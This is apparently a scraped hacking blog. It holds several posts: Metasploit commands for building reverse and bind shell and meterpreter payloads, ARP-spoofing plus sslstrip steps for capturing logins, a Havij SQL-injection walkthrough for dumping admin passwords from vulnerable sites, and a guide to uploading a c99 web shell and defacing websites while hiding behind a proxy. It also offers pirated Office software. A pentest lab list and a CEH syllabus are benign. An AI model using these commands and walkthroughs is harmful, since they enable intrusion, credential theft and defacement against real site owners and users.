WIFI hacking TUTORIAL

3:06 pm , 1 comments
WIFI hacking BACKTRACK 5 complete TUTORIAL








Password: computermaniac

1 comments:

Microsoft Office Professional Plus 2010 Full Version

1:35 pm 0 comments

                      Microsoft Office Professional Plus 2010 Full Version + Serial Key

Microsoft Office Professional Plus 2010 Full Version + Serial Key


Microsoft Office Professional Plus 2010 Full Version + Serial Key empowers your people to do their best work from more places – whether they’re using a PC, phone or web browser. It can maximize existing investments and help people accomplish more by bringing server capabilities to everyone through familiar and intuitive applications. Office Professional Plus 2010 provides smart, simple, time-saving tools to help everyone do more with less.

We are inviting IT professionals around the world to evaluate Microsoft Office Professional Plus 2010 in your lab environments and with Microsoft Office enthusiasts in your organization. And when you 
download this 60-day trial software, you’re automatically registered to receive valuable resources delivered at strategic intervals throughout the software evaluation period.

Please read the following to get an idea of the key things you need to know before you evaluate Office Professional Plus 2010.
1.Use a non-primary PC for evaluation. This Office Professional Plus 2010 evaluation will de-activate in 60 days and it requires the removal of previous versions of Office prior to installation. Thus, we recommend not evaluating this software on a PC that will require an activated copy of Office after the 60 day trial period is over.
2.60-Day evaluation expiration. This evaluation software will expire in 60 days after which it will deactivate and must be uninstalled before installing a purchased copy.
3.Technical details/updates. Before installing the software please read the Release Notes.
4.Getting started. Learn more about Office Professional Plus 2010 by visiting the Getting Started Resource Center on TechNet. Check back often for more content updates.
5.Keep up with the news. You can keep up with general technical information and news by participating in the Microsoft Office 2010 Forum (on TechNet) and reading the Microsoft Office 2010 Team Blog.
6.Keep your PC updated. Be sure to turn on automatic updates in Windows Update for Office Professional Plus 2010.

Download: 

                    Microsoft Office 2007 Professional Full

    0 comments:

    Metasploit Payloads Tutorial

    10:51 am 0 comments


    Metasploit Payloads - msfpayload


    This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.

    These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.

    In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


    1. For a listening shell on the target

    Create payload:
    ./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

    Target:
    run Listen-shell.exe

    Hacker:
    nc 192.168.1.110 2482



    2. For a reverse shell on the target

    Create payload:
    ./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

    Target:
    run reverse-shell.exe



    3. For a VNC listener on target

    Create payload:
    ./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

    Target:
    run Listen-vnc.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 



    4. For a reverse VNC session

    Create payload:
    ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

    Target:
    run reverse-vnc.exe



    5. For a meterpreter listener

    create payload:
    ./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

    Target:
    run met-listen.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



    6. For a reverse meterpreter connection (not working yet. not sure why)

    Create payload:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe

    Hacker:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

    Target:
    run met-reverse.exe


    UPDATE: Payload for 6 should read:

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe

    0 comments:

    SSL Strip using Backtrack

    10:46 am 0 comments


    SSL Strip is a tool that hijacks HTTP traffic on a network by replacing all the HTTPS/SSL links with HTTP ones. Once SSL Strip is setup all the victim traffic will be routed through the attacker and HTTP traffic will be redirected to the attacker machine. The attacker will be able to obtain all logon information by sniffing the HTTP plaintext protocol.

    How to:
    1. Set up IP Forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward

    2. Set up Port redirection using iptables
    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1337

    3. Start ARP MITM
    arpspoof -i eth0 -t VICTIMIP GATEWAY

    4. Start SSL Strip Tool
    sslstrip -l 1337 -w log.txt

    5. Wait until the target login to a website that supposed to use HTTPS/SSL

    6. Check log.txt for captured information

    0 comments:

    Pentest lab

    10:43 am 0 comments


    Pentest lab vulnerable servers-applications list



    In this post I’m going to present some useful resources to learn about penetration testing and where
     to use exploitation tools and techniques in a safe and legal environment. This list contain a set
    of deliberately insecure LiveCDs, Virtual machines and applicarions designed to be used as targets
     for enumeration, web exploitation, password cracking and reverse  engineering.
    If you have other links/distribution/virtual machines, please leave a comment.
    List updated on 13/9/2011
    UltimateLAMP
    UltimateLAMP is a Ubuntu VM  running vulnerable services and containing weak accounts.
    The UltimateLAMP VM runs the following services:Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare,
    Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)
    webgoat
    WebGoat is a deliberately insecure J2EE web application maintained by OWASP 
    designed to teach web application security lessons. In each lesson, users must demonstrate 
    their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. 
    For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. 
    The application is a realistic teaching environment, providing users with hints and code to further 
    explain the lesson.
    Holynix
    Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately
    built to have security holes for the purposes of penetration testing. More of an obstacle course than a
    real world example.
    http://pynstrom.net/index.php?page=holynix.php

    WackoPicko
    WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why 
    Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found:
    http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

    De-ICE PenTest LiveCDs
    The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test
    team at the company he worked for. Needing to learn as much about penetration testing as quickly
    as possible, Thomas began looking for both tools and targets. He found a number of tools, but no
    usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas
    created PenTest scenarios using LiveCDs.
    http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks
    Metasploitable
    Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable
    packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki,
    and an older mysql.
    http://blog.metasploit.com/2010/05/introducing-metasploitable.html
    Owaspbwa
    Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection
    of vulnerable web applications.
    http://code.google.com/p/owaspbwa/
    Web Security Dojo
    A free open-source self-contained training environment for Web Application Security penetration
    testing. Tools + Targets = Dojo
    http://www.mavensecurity.com/web_security_dojo/
    Lampsecurity
    LAMPSecurity training is designed to be a series of vunlerable virtual machine images along
    with complementary documentation designed to teach linux,apache,php,mysql security.
    http://sourceforge.net/projects/lampsecurity/files/
    Damn Vulnerable Web App (DVWA)
    Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are
    to be an aid for security professionals to test their skills and tools in a legal environment, help
    web developers better understand the processes of securing web applications and aid teachers/students
    to teach/learn web application security in a class room environment.
    www.dvwa.co.uk
    Hacking-Lab
    This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized
    client environment for solving our Hacking-Lab wargame challenges from remote.
    http://www.hacking-lab.com/hl_livecd/
    Moth 
    Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
    http://www.bonsai-sec.com/en/research/moth.php
    Exploit kb vulnerable web app
    exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection
    Techniques This is a fully functional web site with a content management system based on fckeditor.
    You can download it as source code or a pre configured.
    http://sourceforge.net/projects/exploitcoilvuln/
    Gruyere
    This codelab shows how web application vulnerabilities can be exploited and how to defend against
    these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real
    penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
    How an application can be attacked using common web security vulnerabilities, like cross-site
    scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these
    common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information
    disclosure, or remote code execution. To get the most out of this lab, you should have some
     familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies,
     AJAX, etc.).
    Damn Vulnerable Linux (DVL)
    Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
    http://www.damnvulnerablelinux.org
    pWnOS
    pWnOS is on a “VM Image”, that creates a target on which to practice penetration testing; with
    the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points
    http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html
    Virtual Hacking Lab
    A mirror of deliberately insecure applications and old softwares with known vulnerabilities. Used for
    proof-of-concept /security training/learning purposes. Available in either virtual images or live iso or
     standalone formats.
    http://sourceforge.net/projects/virtualhacking/files/
    Badstore
    Badstore.net is dedicated to helping you understand how hackers prey on Web application
    vulnerabilities, and to showing you how to reduce your exposure.
    http://www.badstore.net/
    BodgeIt Store
    The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new 
    to pen testing.
    Hackademic Challenges
    The OWASP Hackademic Challenges , is an open source project that can be used to test and
     improve one’s knowledge of information system and web application security. The OWASP
    Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe,
    controllable environment. Users can attempt to discover and exploit these vulnerabilities in order
    to learn important concepts of information security through the attacker’s perspective.
    www.hackademic.eu

    OWASP Vicnum Project
    A flexible web app showing vulnerabilities such as cross site scripting, sql injections,and session
    management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ .
    Play the game at http://vicnum.ciphertechs.com
    https://sourceforge.net/projects/vicnum/

    Stanford SecuriBench
    Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground 
    for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.
    Kioptrix
    This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).The purpose of these games are
    to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more
    ways then one to successfully complete the challenges.
    http://www.kioptrix.com/blog/?page_id=135
    Hackxor
    Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to 
    progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains 
    XSS,CSRF, SQLi, ReDoS, DOR, command injection, etc
    Project GameOver:
    Project GameOver was started with the objective of training and educating newbies about the basics
    of web security and educate them about the common web attacks and help them understand how they work. It is collection of various vulnerable web applications, designed for the purpose of learning web penetration testing. We have included some of the above mentioned deliberately vulnerable websites.

    0 comments:

    Comptia N+ Ebook

    10:39 am 0 comments







    LESSON 1: Basic Network Theory
    Network Definitions
    Network Models
    Connectivity
    Network Addressing
    Signaling Concepts

    LESSON 2: Network Connectivity
    The Data Package
    Establishing a Connection
    Reliable Delivery
    Network Connectivity
    Noise Control
    Building Codes
    Connection Devices

    LESSON 3: Advanced Network Theory
    The OSI Model
    Ethernet
    Network Resources
    Token Ring/IEEE 802.5
    FDDI
    Wireless Networking

    LESSON 4: Common Network Protocols
    Families of Protocols
    NetBEUI
    Bridges and Switches
    The TCP/IP Protocol
    Building a TCP/IP Network
    The TCP/IP Suite

    LESSON 5: TCP/IP Services
    Dynamic Host Configuration Protocol
    DNS Name Resolution
    NetBIOS Support
    SNMP
    TCP/IP Utilities
    Upper Layer Services: FTP

    LESSON 6: Alternate Network Protocols
    Introduction to IPX/SPX
    AppleTalk
    Introduction to Apple Open Transport
    Introduction to IPv6

    LESSON 7: Network LAN Infrastructure
    Implement LAN Protocols on a Network
    IP Routing
    IP Routing Tables
    Router Discovery Protocols
    Data Movement in a Routed Network
    Virtual LANs (VLANs)

    LESSON 8: Network WAN Infrastructure
    The WAN Environment
    WAN Transmission Technologies
    WAN Connectivity Devices
    Voice Over Data Services

    LESSON 9: Remote Networking
    Remote Networking
    Remote Access Protocols
    VPN Technologies

    LESSON 10: Network Security
    Introduction to Network Security
    Virus Protection
    Local Security
    Network Access
    Internet Security

    LESSON 11: Disaster Recovery
    The Need for Disaster Recovery
    Disaster Recovery Plan
    Data Backups
    Fault Tolerance

    LESSON 12: Advanced Data Storage Techniques
    Enterprise Data Storage
    Clustering
    Network Attached Storage
    Storage Area Networks

    LESSON 13: Network Troubleshooting
    Using a Systematic Approach to Troubleshooting
    Network Support Tools: Utilities
    The Network Baseline

    LESSON 14: Network Operating Systems
    Novell NetWare
    Microsoft BackOffice
    Linux History and Operation
    Macintosh

    LESSON 15: Appendix
    Appendix


    0 comments:

    Havij Tutorial-Website Hacking

    10:36 am 2 comments


    Havij Tutorial-Website Hacking


      it is simple tut how to use havij to hack sites
                                                               
                                                              Click Here To Download Havij

    1.First Find a sqli infected site

    2-Open havij and copy and paste infected link as shown in figure

    3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name l
    ike xxxx_xxxx

    4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed
     

    5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

    6. In that Just put mark username and password and click "Get data"

    7. Bingo Got now id and pass that may be admin...
    The pass will get as md5 you can crack it also using this tool as shown in figure..




    For SQL Dorks List Click Here And Download it Now

    2 comments:

    Hack Website

    10:33 am 0 comments

    Upload Shell and Deface a Website







    What we need:

    1-A Shell (Will be provided)

    2-A website vulnerable to SQLi

    3-Image or File upload area on that Vulnerable website

    So firstly download the shell here.

    Download


    What is Shell ?

    A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
    This is a plain c99 shell, BUT it is Undetected so you should not get a warning from a anti virus if you download it. (update: not Undetected anymore )


    So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.

    Now login to the admin page with the admin details you got.

    Go through the admin page until you find a place where you can upload a picture (Usually a picture).

    Now you have to upload the shell. Right if you don’t get an error it is all good.

    Now to find the shell

    Go through the site until you find any image and if you are using firefox Right

    - Click on it and “Copy Image Location”

    Make a new tab and paste it there.

    It will probably look something like this:

    http://www.example.com/images/photonamehere.jpg

    So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)

    Now a page will come up looking like this:

    igz03k How To Upload Shell and Deface Tutorial

    Does probably not look like that but will look similar.

    Now you have access to all the files on the site
    What you want to do is now,
    Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.

    Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.

    Keep in mind:

    • Change Admin Username and Password

    •The people have FTP access so you need to change that Password too .

    •Always use a Proxy or VPN

    0 comments:

    Online hacking Tools

    10:31 am 0 comments


    Online Tools




    Footprinting 


    Hash Cracking


    Converters

    Binary Translator

    0 comments:

    Ethical Hacking Syllabus overview

    10:30 am 0 comments


    Certified Ethical Hacking Syllabus


    Certified Ethical Hacker (312-50) CEH
    1.CEH Ethics and Legal Issues12.CEH Web Application Vulnerabilities
    2.CEH Footprinting 13.CEH Web Based Password Cracking Techniques
    3.CEH Scanning 14.CEH SQL Injection
    4.CEH Enumeration 15.CEH Hacking Wireless Networks
    5.CEH System Hacking 16.CEH Virus and Worms
    6.CEH Trojans and Backdoors 17.CEH Hacking Novell
    7.CEH Sniffers 18.CEH Hacking Linux
    8.CEH Denial of Service 19.CEH IDS, Firewalls and Honeypots
    9.CEH Social Engineering 20.CEH Buffer Overflows
    10.CEH Session Hijacking21.CEH Cryptography
    11.CEH Hacking Web Servers22.CEH Penetration Testing Methodologies

    Certified Ethical Hacker (CEH) Module 1: Ethics and Legality
    • What is an Exploit?
    • The security functionality triangle
    • The attacker's process
    • Passive reconnaissance
    • Active reconnaissance
    • Types of attacks
    • Categories of exploits
    • Goals attackers try to achieve
    • Ethical hackers and crackers - who are they
    • Self proclaimed ethical hacking
    • Hacking for a cause (Hacktivism)
    • Skills required for ethical hacking
    •   Categories of Ethical Hackers
    •   What do Ethical Hackers do?
    •   Security evaluation plan
    •   Types of Ethical Hacks
    •   Testing Types
    •   Ethical Hacking Report
    •   Cyber Security Enhancement Act of 2002
    •   Computer Crimes
    •   Overview of US Federal Laws
    •   Section 1029
    •   Section 1030
    •   Hacking Punishment

    Certified Ethical Hacker (CEH) Module 2: Footprinting
    • What is Footprinting
    • Steps for gathering information
    • Whois
    • http://tucows.com
    • Hacking Tool: Sam Spade
    • Analyzing Whois output
    • NSLookup
    • Finding the address range of the network
    •   ARIN
    •   Traceroute
    •   Hacking Tool: NeoTrace
    •   Visual Route
    •   Visual Lookout
    •   Hacking Tool: Smart Whois
    •   Hacking Tool: eMailTracking Pro
    •   Hacking Tool: MailTracking.com

    Certified Ethical Hacker (CEH) Module 3: Scanning
    • Determining if the system is alive?
    • Active stack fingerprinting
    • Passive stack fingerprinting
    • Hacking Tool: Pinger
    • Hacking Tool: Friendly Pinger
    • Hacking Tool: WS_Ping_Pro
    • Hacking Tool: Netscan Tools Pro 2000
    • Hacking Tool: Hping2
    • Hacking Tool: KingPing
    • Hacking Tool: icmpenum
    • Hacking Tool: SNMP Scanner
    • Detecting Ping sweeps
    • ICMP Queries
    • Hacking Tool: netcraft.com
    • Port Scanning
    • TCPs 3-way handshake
    • TCP Scan types
    • Hacking Tool: IPEye
    • Hacking Tool: IPSECSCAN
    •   Hacking Tool: nmap
    •   Port Scan countermeasures
    •   Hacking Tool: HTTrack Web Copier
    •   Network Management Tools
    •   SolarWinds Toolset
    •   NeoWatch
    •  War Dialing
    •   Hacking Tool: THC-Scan
    •   Hacking Tool: PhoneSweep War Dialer
    •   Hacking Tool: Telesweep
    •   Hacking Tool: Queso
    •   Hacking Tool: Cheops
    •   Proxy Servers
    •   Hacking Tool: SocksChain
    •   Surf the web anonymously
    •   TCP/IP through HTTP Tunneling
    •   Hacking Tool: HTTPort
    •   Hacking Tool: Tunneld
    •   Hacking Tool: BackStealth

    Certified Ethical Hacker (CEH) Module 4: Enumeration
    • Determining if the system is alive?
    • What is Enumeration
    • NetBios Null Sessions
    • Null Session Countermeasures
    • NetBIOS Enumeration
    • Hacking Tool: DumpSec
    • Hacking Tool: Hyena
    • Hacking Tool: NAT
    • SNMP Enumertion
    • SNMPUtil
    • Hacking Tool: IP Network Browser
    • SNMP Enumeration Countermeasures
    • Windows 2000 DNS Zone transfer
    •  Identifying Win2000 Accounts
    •  Hacking Tool: User2SID
    •  Hacking Tool: SID2User
    •  Hacking Tool: Enum
    •  Hacking Tool: UserInfo
    •  Hacking Tool: GetAcct
    •  Hacking Tool: smbbf
    •  SMB Auditing Tools
    •  Active Directory Enumeration
    •  W2K Active Directory attack


    Certified Ethical Hacker (CEH) Module 5: System Hacking
    • Administrator Password Guessing
    • Performing Automated Password Guessing
    • Legion
    • NTInfoScan
    • Defending Against Password Guessing
    • Monitoring Event Viewer Logs
    • VisualLast
    • Eavesdroppin on Network Password Exchange
    • Hacking Tool: L0phtCrack
    • Hacking Tool: KerbCrack
    • Privilege Escalation
    • Hacking Tool: GetAdmin
    • Hacking Tool: hk
    • Manual Password Cracking Algorithm
    • Automatic Password Cracking Algorithm
    • Password Types
    • Types of Password Attacks
    • Dictionary Attack
    • Brute Force Attack
    • Distributed Brute Force Attack
    • Password Change Interval
    • Hybrid Attack
    • Cracking Windows 2000 Passwords
    • Retrieving the SAM file
    • Redirecting SMB Logon to the Attacker
    • SMB Redirection
    • Hacking Tool: SMBRelay
    • Hacking Tool: SMBRelay2
    • Hacking Tool: pwdump2
    • Hacking Tool: SAMdump
    • Hacking Tool: C2MYAZZ
    • Win32 Create Local Admin User
    • Offline NT Password Resetter
    • Hacking Tool: psexec
    • Hacking Tool: remoxec
    • SMBRelay Man-in-the-Middle (MITM)
    • SMBRelay MITM Countermeasures
    • Hacking Tool: SMBGrinder
    • Hacking Tool: SMBDie
    • Hacking Tool: NBTDeputy
    • NetBIOS DoS Attack
    • Hacking Tool: nbname
    • Hacking Tool: John the Ripper
    • LanManager Hash

    Certified Ethical Hacker (CEH) Module 6: Trojans and Backdoors
    • What is a Trojan Horse?
    • Overt and Covert
    • Hacking Tool: QAZ
    • Hacking Tool: Tini
    • Hacking Tool: Netcat
    • Hacking Tool: Donald Dick
    • Hacking Tool: SubSeven
    • Hacking Tool: BackOrifice 2000
    • Back Oriffice Plug-ins
    • BoSniffer
    • Hacking Tool: NetBus
    • ComputerSpy Key Logger
    • Hacking Tool: Beast Trojan
    • Hacking Tool: CyberSpy Telnet Trojan
    • Hacking Tool: SubRoot Telnet Trojan
    • Hacking Tool: LetMeRule
    • Wrappers
    • Hacking Tool: Graffiti
    • Hacking Tool: Silk Rope 2000
    • Hacking Tool: EliteWrap
    • Hacking Tool: IconPlus
    • Packaging Tool: Microsoft WordPad

    • Hacking Tool: Whack a Mole Trojan Construction Kit
    • Writing Trojans in Java
    • Hacking Tool: FireKiller 2000
    • Covert Channels
    • ICMP Tunneling
    • Hacking Tool: Loki
    • Reverse WWW Shell
    • Backdoor Countermeasures
    • BO Startup and Registry Entries
    • NetBus Startup and Registry Keys
    • Port Monitoring Tools
    • fPort
    • TCPView
    • Process Viewer
    • Inzider - Tracks Processes and Ports
    • Trojan Maker
    • Hacking Tool: Hard Disk Killer
    • Man-in-the-Middle Attack
    • Hacking Tool: dsniff
    • System File Verification
    • TripWire
    Certified Ethical Hacker (CEH) Module 7: Sniffers
    • What is a Sniffer?
    • Hacking Tool: Ethereal
    • Hacking Tool: Snort
    • Hacking Tool: WinDump
    • Hacking Tool: EtherPeek
    • Passive Sniffing
    • Active Sniffing
    • Hacking Tool: EtherFlood
    • How ARP Works?
    • Hacking Tool: ArpSpoof
    • Hacking Tool: DSniff
    • Hacking Tool: Macof
    • Hacking Tool: mailsnarf
    • Hacking Tool: URLsnarf
    • Hacking Tool: Webspy
    • Hacking Tool: Ettercap

    • Hacking Tool: WebMiTM
    • IP Restrictions Scanner
    • Hacking Tool: sTerm
    • Hacking Tool: Cain and Abel
    • Hacking Tool: Packet Crafter
    • Hacking Tool: SMAC
    • MAC Changer
    • ARP Spoofing Countermeasures
    • Hacking Tool: WinDNSSpoof
    • Hacking Tool: Distributed DNS Flooder
    • Hacking Tool: WinSniffer
    • Network Tool: IRIS
    • Network Tool: NetInterceptor
    • SniffDet
    • Hacking Tool: WinTCPKill
    Certified Ethical Hacker (CEH) Module 8: Denial of Service
    • What is Denial of Service Attack?             
    • Types of DoS Attacks
    • How DoS Work?
    • What is DDoS?
    • Hacking Tool: Ping of Death
    • Hacking Tool: SSPing
    • Hacking Tool: Land
    • Hacking Tool: Smurf
    • Hacking Tool: SYN Flood
    • Hacking Tool: CPU Hog
    • Hacking Tool: Win Nuke
    • Hacking Tool: RPC Locator
    • Hacking Tool: Jolt2
    • Hacking Tool: Bubonic
    • Hacking Tool: Targa
    • Tools for Running DDoS Attacks

    • Hacking Tool: Trinoo
    • Hacking Tool: WinTrinoo
    • Hacking Tool: TFN
    • Hacking Tool: TFN2K
    • Hacking Tool: Stacheldraht
    • Hacking Tool: Shaft
    • Hacking Tool: mstream
    • DDoS Attack Sequence
    • Preventing DoS Attack
    • DoS Scanning Tools
    • Find_ddos
    • SARA
    • DDoSPing
    • RID
    • Zombie Zapper
    Certified Ethical Hacker (CEH) Module 9: Social Engineering
    • What is Social Engineering?
    • Art of Manipulation
    • Human Weakness
    • Common Types of Social Engineering
    • Human Based Impersonation
    • Important User
    • Tech Support
    • Third Party Authorization
    • In Person
    • Dumpster Diving

    • Shoulder Surfing
    • Computer Impersonation
    • Mail Attachments
    • Popup Windows
    • Website Faking
    • Reverse Social Engineering
    • Policies and Procedures
    • Social Engineering Security Policies
    • The Importance of Employee Education
    Certified Ethical Hacker (CEH) Module 10: Session Hijacking
    • What is Session Hijacking?   
    • Session Hijacking Steps
    • Spoofing Vs Hijacking
    • Active Session Hijacking
    • Passive Session Hijacking
    • TCP Concepts - 3 way Handshake
    • Sequence Numbers
    • Sequence Number Example
    • Guessing the Sequence Numbers

    •   Hacking Tool: Juggernaut
    •   Hacking Tool: Hunt
    •   Hacking Tool: TTYWatcher
    •   Hacking Tool: IP Watcher
    •   Hacking Tool: T-Sight
    •   Remote TCP Session Reset Utility
    •   Dangers Posed by Session Hijacking
    •   Protection against Session Hijacking
    Certified Ethical Hacker (CEH) Module 11: Hacking Web Servers
    • Apache Vulnerability
    • Attacks against IIS
    • IIS Components
    • ISAPI DLL Buffer Overflows
    • IPP Printer Overflow
    • msw3prt.dll
    • Oversized Print Requests
    • Hacking Tool: Jill32
    • Hacking Tool: IIS5-Koei
    • Hacking Tool: IIS5Hack
    • IPP Buffer Overflow Countermeasures
    • ISAPI DLL Source Disclosure
    • ISAPI.DLL Exploit
    • Defacing Web Pages
    • IIS Directory Traversal
    • Unicode
    • Directory Listing
    • Clearing IIS Logs
    • Network Tool: LogAnalyzer
    • Attack Signature
    • Creating Internet Explorer (IE) Trojan
    • Hacking Tool: IISExploit

    • Hacking Tool: UnicodeUploader.pl
    • Hacking Tool: cmdasp.asp
    • Escalating Privilages on IIS
    • Hacking Tool: IISCrack.dll
    • Hacking Tool: ispc.exe
    • IIS WebDav Vulnerability
    • Hacking Tool: WB
    • RPC Exploit-GUI
    • Hacking Tool: DComExpl_UnixWin32
    • Hacking Tool: Plonk
    • Unspecified Executable Path Vulnerability
    • Hacking Tool: CleanIISLog
    • File System Traversal Countermeasures
    • Microsoft HotFix Problems
    • UpdateExpert
    • Cacls utility
    • Network Tool: Whisker
    • N-Stealth Scanner
    • Hacking Tool: WebInspect
    • Network Tool: Shadow Security Scanner
    Certified Ethical Hacker (CEH) Module 12: Web Application Vulnerabilities
    • Documenting the Application Structure
    • Manually Inspecting Applications
    • Using Google to Inspect Applications
    • Directory Structure
    • Hacking Tool: Instant Source
    • Java Classes and Applets
    • Hacking Tool: Jad
    • HTML Comments and Contents
    • Hacking Tool: Lynx
    •     Hacking Tool: Wget
    •     Hacking Tool: Black Widow
    •     Hacking Tool: WebSleuth
    •     Cross Side Scripting
    •     Session Hijacking using XSS
    •     Cookie Stealing
    •     Hacking Tool: IEEN
    •     Hacking Tool: IEflaw
    •     Exposing Sensitive Data with Google

    Certified Ethical Hacker (CEH) Module 13: Web Based Password Cracking Techniques
    • Basic Authentication
    • Message Digest Authentication
    • NTLM Authentication
    • Certificate based Authentication
    • Digital Certificates
    • Microsoft Passport Authentication
    • Forms based Authentication
    • Creating Fake Certificates
    • Hacking Tool: WinSSLMiM
    • Password Guessing
    • Dfault Account Database
    • Hacking Tool: WebCracker
    • Hacking Tool: Brutus
    •        Hacking Tool: ObiWan
    •        Hacking Tool: Munga Bunga
    •        Password dictionary Files
    •        Attack Time
    •        Hacking Tool: Variant
    •        Hacking Tool: PassList
    •        Query Strings
    •        Post data
    •        Hacking Tool: cURL
    •        Stealing Cookies
    •        Hacking Tool: CookieSpy
    •        Hacking Tool: ReadCookies
    •        Hacking Tool: SnadBoy

    Certified Ethical Hacker (CEH) Module 14: SQL Injection
    • What is SQL Injection Vulnerability?
    • SQL Insertion Discovery
    • Blank sa Password
    • Simple Input Validation
    • SQL Injection
    • OLE DB Errors
    • 1=1
    • blah' or 1=1
    •  Preventing SQL Injection
    •  Database Specific SQL Injection
    •  Hacking Tool: SQLDict
    •  Hacking Tool: SQLExec
    •  Hacking Tool: SQLbf
    •  Hacking Tool: SQLSmack
    •  Hacking Tool: SQL2.exe
    •  Hacking Tool: Oracle Password Buster

    Certified Ethical Hacker (CEH) Module 15: Hacking Wireless Networks
    • 802.11 Standards
    • What is WEP?
    • Finding WLANs
    • Cracking WEP keys
    • Sniffing Trafic
    • Wireless DoS Attacks
    • WLAN Scanners
    • WLAN Sniffers
    • MAC Sniffing
    •   Access Point Spoofing
    •   Securing Wireless Networks
    •   Hacking Tool: NetTumbler
    •   Hacking Tool: AirSnort
    •   Hacking Tool: AiroPeek
    •   Hacking Tool: WEP Cracker
    •   Hacking Tool: Kismet
    •   Hacking Tool: AirSnarf
    •   WIDZ- Wireless IDS

    Certified Ethical Hacker (CEH) Module 16: Virus and Worms
    • Cherobyl
    • ExploreZip
    • I Love You
    • Melissa
    • Pretty Park
    • Code Red Worm
    • W32/Klez
    • BugBear

    • W32/Opaserv Worm
    • Nimda
    • Code Red
    • SQL Slammer
    • Batch File Virus Creator
    • How to write your own Virus?
    • Worm Construction Kits
    Certified Ethical Hacker (CEH) Module 17: Novell Hacking
    • Common accounts and passwords
    • Accessing password files
    • Password crackers
    • Netware Hacking Tools
    • Chknull
    • NOVELBFH
    • NWPCRACK
    • Bindery
    • BinCrack
    •         SETPWD.NLM
    •         Kock
    •         userdump
    •         Burglar
    •         Getit
    •         Spooflog
    •         Gobbler
    •         Novelffs
    •         Pandora

    Certified Ethical Hacker (CEH) Module 18: Linux Hacking
    • Why Linux ?
    • Linux Basics
    • Compiling Programs in Linux
